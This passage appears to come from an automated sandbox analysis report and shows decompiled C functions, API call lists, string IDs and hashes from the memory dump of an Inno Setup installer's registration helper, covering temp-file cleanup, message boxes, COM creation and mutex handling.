                                                                    0x006b8f03
                                                                    0x006b8f13
                                                                    0x006b8f20
                                                                    0x006b8e47
                                                                    0x006b8e49
                                                                    0x006b8e4a
                                                                    0x006b8e4f
                                                                    0x006b8e52
                                                                    0x006b8e55
                                                                    0x006b8e6c
                                                                    0x006b8e88
                                                                    0x006b8e98
                                                                    0x006b8e9d
                                                                    0x006b8ea9
                                                                    0x006b8eb8
                                                                    0x006b8eb8
                                                                    0x006b8ec0
                                                                    0x006b8ec0
                                                                    0x006b8ed5
                                                                    0x006b8edf
                                                                    0x006b8ee2
                                                                    0x006b8ee5
                                                                    0x006b8ef3
                                                                    0x006b8ef3

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
                                                                    • FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                    • String ID: isRS-$isRS-???.tmp
                                                                    • API String ID: 134685335-3422211394
                                                                    • Opcode ID: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                                    • Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
                                                                    • Opcode Fuzzy Hash: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                                    • Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C90B4, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			E005C90B4(WCHAR* __eax, void* __ebx, signed int __ecx, WCHAR* __edx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr* _t28;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t41;
				intOrPtr* _t43;
				WCHAR* _t62;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				WCHAR* _t78;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t76 = __edi;
				_t80 = _t81;
				_t82 = _t81 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_v8 = __ecx;
				_t78 = __edx;
				_t62 = __eax;
				if( *0x6d5814 != 0) {
					_v8 = _v8 | 0x00180000;
				}
				E005C9060();
				_push(_t80);
				_push(0x5c91da);
				_push( *[fs:edx]);
				 *[fs:edx] = _t82;
				_t28 =  *0x6cdec4; // 0x6d579c
				if(IsIconic( *( *_t28 + 0x188)) == 0) {
					_t32 =  *0x6cdec4; // 0x6d579c
					_t36 = GetWindowLongW( *( *_t32 + 0x188), 0xfffffff0) & 0xffffff00 | (_t35 & 0x10000000) == 0x00000000;
				} else {
					_t36 = 1;
				}
				if(_t36 == 0) {
					_t37 =  *0x6cdec4; // 0x6d579c
					_t41 = GetWindowLongW( *( *_t37 + 0x188), 0xffffffec) & 0xffffff00 | (_t40 & 0x00000080) != 0x00000000;
				} else {
					_t41 = 1;
				}
				if(_t41 == 0) {
					_t43 =  *0x6cdec4; // 0x6d579c
					_v12 = L005B8BCC( *_t43, _t62, _t78, _t62, _t76, _t78, _v8);
					_pop(_t73);
					 *[fs:eax] = _t73;
					_push(E005C91E1);
					return E005C9060();
				} else {
					_v16 = GetActiveWindow();
					_v20 = E005ABB4C(0, _t62, _t76, _t78);
					_push(_t80);
					_push(0x5c919d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t82;
					_v12 = MessageBoxW(0, _t62, _t78, _v8 | 0x00002000);
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E005C91A4);
					E005ABC0C(_v20);
					return SetActiveWindow(_v16);
				}
			}





















                                                                    0x005c90b4
                                                                    0x005c90b5
                                                                    0x005c90b7
                                                                    0x005c90ba
                                                                    0x005c90bb
                                                                    0x005c90bc
                                                                    0x005c90bf
                                                                    0x005c90c1
                                                                    0x005c90ca
                                                                    0x005c90cc
                                                                    0x005c90cc
                                                                    0x005c90d8
                                                                    0x005c90df
                                                                    0x005c90e0
                                                                    0x005c90e5
                                                                    0x005c90e8
                                                                    0x005c90eb
                                                                    0x005c9100
                                                                    0x005c9106
                                                                    0x005c9120
                                                                    0x005c9102
                                                                    0x005c9102
                                                                    0x005c9102
                                                                    0x005c9125
                                                                    0x005c912b
                                                                    0x005c9142
                                                                    0x005c9127
                                                                    0x005c9127
                                                                    0x005c9127
                                                                    0x005c9147
                                                                    0x005c91af
                                                                    0x005c91bf
                                                                    0x005c91c4
                                                                    0x005c91c7
                                                                    0x005c91ca
                                                                    0x005c91d9
                                                                    0x005c9149
                                                                    0x005c914e
                                                                    0x005c9158
                                                                    0x005c915d
                                                                    0x005c915e
                                                                    0x005c9163
                                                                    0x005c9166
                                                                    0x005c917b
                                                                    0x005c9180
                                                                    0x005c9183
                                                                    0x005c9186
                                                                    0x005c918e
                                                                    0x005c919c
                                                                    0x005c919c

                                                                    APIs
                                                                    • IsIconic.USER32(?), ref: 005C90F9
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 005C9116
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005C913B
                                                                    • GetActiveWindow.USER32 ref: 005C9149
                                                                    • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
                                                                    • SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$ActiveLong$IconicMessage
                                                                    • String ID:
                                                                    • API String ID: 1633107849-0
                                                                    • Opcode ID: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                                    • Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
                                                                    • Opcode Fuzzy Hash: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                                    • Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0062CFB8, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 48%
                                                                    			E0062CFB8(void* __ebx) {
				void* _v8;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr* _t22;
				intOrPtr* _t25;
				intOrPtr _t34;
				intOrPtr _t38;

				_push(0);
				_push(_t38);
				_push(0x62d04e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				if( *0x6d63b4 != 0) {
					L6:
					_pop(_t34);
					 *[fs:eax] = _t34;
					_push(E0062D055);
					return E0040EC28( &_v8);
				}
				if(GetVersion() >= 0x601) {
					_push(E0040EC28( &_v8));
					_t20 =  *0x6ce1cc; // 0x6cd0d4
					_push(_t20);
					_push(1);
					_push(0);
					_t21 =  *0x6cdad4; // 0x6cd0c4
					_push(_t21);
					L0043C1EC();
					if(_t21 == 0) {
						_t22 = _v8;
						_push(_t22);
						if( *((intOrPtr*)( *_t22 + 0xc))() == 0) {
							_t25 = _v8;
							 *((intOrPtr*)( *_t25 + 4))(_t25);
							E0040EC40(0x6d63b8, _v8);
						}
					}
				}
				 *0x6d63b4 = 1;
				goto L6;
			}










                                                                    0x0062cfbb
                                                                    0x0062cfc0
                                                                    0x0062cfc1
                                                                    0x0062cfc6
                                                                    0x0062cfc9
                                                                    0x0062cfd3
                                                                    0x0062d02e
                                                                    0x0062d03a
                                                                    0x0062d03d
                                                                    0x0062d040
                                                                    0x0062d04d
                                                                    0x0062d04d
                                                                    0x0062cfe0
                                                                    0x0062cfea
                                                                    0x0062cfeb
                                                                    0x0062cff0
                                                                    0x0062cff1
                                                                    0x0062cff3
                                                                    0x0062cff5
                                                                    0x0062cffa
                                                                    0x0062cffb
                                                                    0x0062d002
                                                                    0x0062d004
                                                                    0x0062d007
                                                                    0x0062d00f
                                                                    0x0062d011
                                                                    0x0062d017
                                                                    0x0062d022
                                                                    0x0062d022
                                                                    0x0062d00f
                                                                    0x0062d002
                                                                    0x0062d027
                                                                    0x00000000

                                                                    APIs
                                                                    • GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
                                                                    • CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateInstanceVersion
                                                                    • String ID:
                                                                    • API String ID: 1462612201-0
                                                                    • Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                                    • Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
                                                                    • Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                                    • Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C8B3C, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005C8B3C(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				void* _t18;
				intOrPtr _t19;

				_t18 = __eax;
				InitializeSecurityDescriptor( &_v36, 1);
				SetSecurityDescriptorDacl( &_v36, 0xffffffff, 0, 0);
				_v16 = 0xc;
				_v12 = _t19;
				_v8 = 0;
				return E00413E90( &_v16, 0, E0040B278(_t18));
			}









                                                                    0x005c8b40
                                                                    0x005c8b49
                                                                    0x005c8b59
                                                                    0x005c8b5e
                                                                    0x005c8b68
                                                                    0x005c8b6e
                                                                    0x005c8b8a

                                                                    APIs
                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C8B49
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C8B59
                                                                      • Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B91D7,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000), ref: 00413EA6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                                    • String ID:
                                                                    • API String ID: 3525989157-0
                                                                    • Opcode ID: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                                    • Instruction ID: 330012b0c6753e8d8900aa9d7e53afb48d76169d5e03c13c529c7fe63a2e2798
                                                                    • Opcode Fuzzy Hash: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                                    • Instruction Fuzzy Hash: E9E092B16443006FE700DFB58C86F9B77DC9B84725F104A2EB664DB2C1E778DA48879A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B9138, Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E006B9138(char __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v21;
				signed int _v22;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v60;
				void* _t62;
				signed int _t110;
				intOrPtr _t129;
				signed int _t130;
				char _t134;
				char _t139;
				char _t142;
				char* _t149;
				intOrPtr* _t158;
				void* _t159;
				intOrPtr _t181;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr* _t204;
				intOrPtr _t206;
				intOrPtr _t207;
				void* _t216;

				_t216 = __fp0;
				_t202 = __edi;
				_t157 = __ebx;
				_t206 = _t207;
				_t159 = 7;
				do {
					_push(0);
					_push(0);
					_t159 = _t159 - 1;
				} while (_t159 != 0);
				_push(__ebx);
				_push(__edi);
				_t204 =  *0x6cdec4; // 0x6d579c
				_push(_t206);
				_push(0x6b94fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t207;
				E005C6FB0(1, __ebx,  &_v36, __edi, _t204);
				_t62 = E00422368(_v36, _t159, L"/REG");
				_t209 = _t62;
				if(_t62 != 0) {
					E005C6FB0(1, __ebx,  &_v40, __edi, _t204);
					__eflags = E00422368(_v40, _t159, L"/REGU");
					if(__eflags != 0) {
						__eflags = 0;
						_pop(_t181);
						 *[fs:eax] = _t181;
						_push(E006B9504);
						E0040A228( &_v60, 7);
						return E0040A228( &_v20, 4);
					} else {
						_v21 = 0;
						goto L6;
					}
				} else {
					_v21 = 1;
					L6:
					E005B8250( *_t204, L"Setup", _t209);
					ShowWindow( *( *_t204 + 0x188), 5);
					E006AF824();
					_v28 = E00413E90(0, 0, L"Inno-Setup-RegSvr-Mutex");
					ShowWindow( *( *_t204 + 0x188), 0);
					if(_v28 != 0) {
						do {
							E005B8704( *_t204);
						} while (MsgWaitForMultipleObjects(1,  &_v28, 0, 0xffffffff, 0x4ff) == 1);
					}
					ShowWindow( *( *_t204 + 0x188), 5);
					_push(_t206);
					_push(0x6b94ce);
					_push( *[fs:eax]);
					 *[fs:eax] = _t207;
					E005C6FB0(0, _t157,  &_v44, _t202, _t204);
					E005C4F90(_v44, _t157,  &_v8, L".msg", _t202, _t204);
					E005C6FB0(0, _t157,  &_v48, _t202, _t204);
					E005C4F90(_v48, _t157,  &_v12, L".lst", _t202, _t204);
					if(E005C685C(_v12) == 0) {
						E00423A20(_v12);
						E00423A20(_v8);
						_push(_t206);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						E006B9098(_t157,  &_v12, _t202, _t204, __eflags);
						_pop(_t189);
						 *[fs:eax] = _t189;
						_t190 = 0x6b949e;
						 *[fs:eax] = _t190;
						_push(E006B94D5);
						__eflags = _v28;
						if(_v28 != 0) {
							ReleaseMutex(_v28);
							return CloseHandle(_v28);
						}
						return 0;
					} else {
						E005CD6BC(_v8, _t157, 1, 0, _t202, _t204);
						_t110 =  *0x6cddd0; // 0x6d603c
						E005C9044(_t110 & 0xffffff00 | ( *(_t110 + 0x4c) & 0x00000001) != 0x00000000);
						_t192 =  *0x6cded8; // 0x6d5c28
						_t26 = _t192 + 0x2f8; // 0x0
						E005B8250( *_t204,  *_t26,  *(_t110 + 0x4c) & 0x00000001);
						_push(_t206);
						_push(0x6b946a);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						E006AC8CC(_t157,  *_t26, _t202, _t204);
						_v32 = E005CBFB8(1, 1, 0, 2);
						_push(_t206);
						_push(0x6b9450);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						while(E005CC258(_v32) == 0) {
							E005CC268(_v32, _t157,  &_v16, _t202, _t204, __eflags);
							_t157 = _v16;
							__eflags = _t157;
							if(_t157 != 0) {
								_t158 = _t157 - 4;
								__eflags = _t158;
								_t157 =  *_t158;
							}
							__eflags = _t157 - 4;
							if(__eflags > 0) {
								__eflags =  *_v16 - 0x5b;
								if(__eflags == 0) {
									__eflags =  *((short*)(_v16 + 6)) - 0x5d;
									if(__eflags == 0) {
										E0040B698(_v16, 0x7fffffff, 5,  &_v20);
										_t129 = _v16;
										__eflags =  *((short*)(_t129 + 4)) - 0x71;
										if( *((short*)(_t129 + 4)) == 0x71) {
											L19:
											_t130 = 1;
										} else {
											__eflags = _v21;
											if(_v21 == 0) {
												L18:
												_t130 = 0;
											} else {
												_t149 =  *0x6cdcc4; // 0x6d67df
												__eflags =  *_t149;
												if( *_t149 == 0) {
													goto L19;
												} else {
													goto L18;
												}
											}
										}
										_v22 = _t130;
										_push(_t206);
										_push(0x6b93c5);
										_push( *[fs:eax]);
										 *[fs:eax] = _t207;
										_t134 = ( *(_v16 + 2) & 0x0000ffff) - 0x53;
										__eflags = _t134;
										if(_t134 == 0) {
											_push(_v22 & 0x000000ff);
											E00624E78(0, _t157, _v20, 1, _t202, _t204, _t216);
										} else {
											_t139 = _t134 - 1;
											__eflags = _t139;
											if(_t139 == 0) {
												__eflags = 0;
												E006255F0(0, _t157, _v20, _t204, 0, _t216);
											} else {
												_t142 = _t139 - 0x1f;
												__eflags = _t142;
												if(_t142 == 0) {
													_push(_v22 & 0x000000ff);
													E00624E78(0, _t157, _v20, 0, _t202, _t204, _t216);
												} else {
													__eflags = _t142 - 1;
													if(__eflags == 0) {
														E0062460C(_v20, _t157, _t204);
													}
												}
											}
										}
										_pop(_t199);
										 *[fs:eax] = _t199;
									}
								}
							}
						}
						_pop(_t196);
						 *[fs:eax] = _t196;
						_push(E006B9457);
						return E00408444(_v32);
					}
				}
			}




































                                                                    0x006b9138
                                                                    0x006b9138
                                                                    0x006b9138
                                                                    0x006b9139
                                                                    0x006b913b
                                                                    0x006b9140
                                                                    0x006b9140
                                                                    0x006b9142
                                                                    0x006b9144
                                                                    0x006b9144
                                                                    0x006b9147
                                                                    0x006b9149
                                                                    0x006b914a
                                                                    0x006b9152
                                                                    0x006b9153
                                                                    0x006b9158
                                                                    0x006b915b
                                                                    0x006b9166
                                                                    0x006b9173
                                                                    0x006b9178
                                                                    0x006b917a
                                                                    0x006b918a
                                                                    0x006b919c
                                                                    0x006b919e
                                                                    0x006b94d5
                                                                    0x006b94d7
                                                                    0x006b94da
                                                                    0x006b94dd
                                                                    0x006b94ea
                                                                    0x006b94fc
                                                                    0x006b91a4
                                                                    0x006b91a4
                                                                    0x00000000
                                                                    0x006b91a4
                                                                    0x006b917c
                                                                    0x006b917c
                                                                    0x006b91a8
                                                                    0x006b91af
                                                                    0x006b91bf
                                                                    0x006b91c4
                                                                    0x006b91d7
                                                                    0x006b91e5
                                                                    0x006b91ee
                                                                    0x006b91f0
                                                                    0x006b91f2
                                                                    0x006b920b
                                                                    0x006b91f0
                                                                    0x006b921b
                                                                    0x006b9222
                                                                    0x006b9223
                                                                    0x006b9228
                                                                    0x006b922b
                                                                    0x006b9233
                                                                    0x006b9243
                                                                    0x006b924d
                                                                    0x006b925d
                                                                    0x006b926c
                                                                    0x006b9474
                                                                    0x006b947c
                                                                    0x006b9483
                                                                    0x006b9489
                                                                    0x006b948c
                                                                    0x006b948f
                                                                    0x006b9496
                                                                    0x006b9499
                                                                    0x006b94aa
                                                                    0x006b94ad
                                                                    0x006b94b0
                                                                    0x006b94b5
                                                                    0x006b94b9
                                                                    0x006b94bf
                                                                    0x00000000
                                                                    0x006b94c8
                                                                    0x006b94cd
                                                                    0x006b9272
                                                                    0x006b9279
                                                                    0x006b927e
                                                                    0x006b928a
                                                                    0x006b928f
                                                                    0x006b9295
                                                                    0x006b929d
                                                                    0x006b92a4
                                                                    0x006b92a5
                                                                    0x006b92aa
                                                                    0x006b92ad
                                                                    0x006b92b0
                                                                    0x006b92ca
                                                                    0x006b92cf
                                                                    0x006b92d0
                                                                    0x006b92d5
                                                                    0x006b92d8
                                                                    0x006b942a
                                                                    0x006b92e6
                                                                    0x006b92eb
                                                                    0x006b92ee
                                                                    0x006b92f0
                                                                    0x006b92f2
                                                                    0x006b92f2
                                                                    0x006b92f5
                                                                    0x006b92f5
                                                                    0x006b92f7
                                                                    0x006b92fa
                                                                    0x006b9303
                                                                    0x006b9307
                                                                    0x006b9310
                                                                    0x006b9315
                                                                    0x006b932c
                                                                    0x006b9331
                                                                    0x006b9334
                                                                    0x006b9339
                                                                    0x006b934f
                                                                    0x006b934f
                                                                    0x006b933b
                                                                    0x006b933b
                                                                    0x006b933f
                                                                    0x006b934b
                                                                    0x006b934b
                                                                    0x006b9341
                                                                    0x006b9341
                                                                    0x006b9346
                                                                    0x006b9349
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006b9349
                                                                    0x006b933f
                                                                    0x006b9351
                                                                    0x006b9356
                                                                    0x006b9357
                                                                    0x006b935c
                                                                    0x006b935f
                                                                    0x006b9369
                                                                    0x006b9369
                                                                    0x006b936d
                                                                    0x006b9398
                                                                    0x006b93a0
                                                                    0x006b936f
                                                                    0x006b936f
                                                                    0x006b936f
                                                                    0x006b9372
                                                                    0x006b93b4
                                                                    0x006b93b6
                                                                    0x006b9374
                                                                    0x006b9374
                                                                    0x006b9374
                                                                    0x006b9378
                                                                    0x006b9385
                                                                    0x006b938d
                                                                    0x006b937a
                                                                    0x006b937a
                                                                    0x006b937d
                                                                    0x006b93aa
                                                                    0x006b93aa
                                                                    0x006b937d
                                                                    0x006b9378
                                                                    0x006b9372
                                                                    0x006b93bd
                                                                    0x006b93c0
                                                                    0x006b93c0
                                                                    0x006b9315
                                                                    0x006b9307
                                                                    0x006b92fa
                                                                    0x006b943c
                                                                    0x006b943f
                                                                    0x006b9442
                                                                    0x006b944f
                                                                    0x006b944f
                                                                    0x006b926c

                                                                    APIs
                                                                    • ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006B9206
                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B
                                                                      • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                    • String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
                                                                    • API String ID: 66301061-906243933
